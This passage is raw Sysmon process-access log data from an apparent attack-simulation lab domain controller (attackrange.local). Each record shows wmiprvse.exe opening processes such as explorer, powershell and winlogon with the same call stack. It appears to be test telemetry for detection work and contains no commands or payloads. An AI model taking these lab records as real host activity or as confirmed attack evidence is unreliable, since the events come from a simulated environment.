T4.dll+111bc 10341000x800000000000000024353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 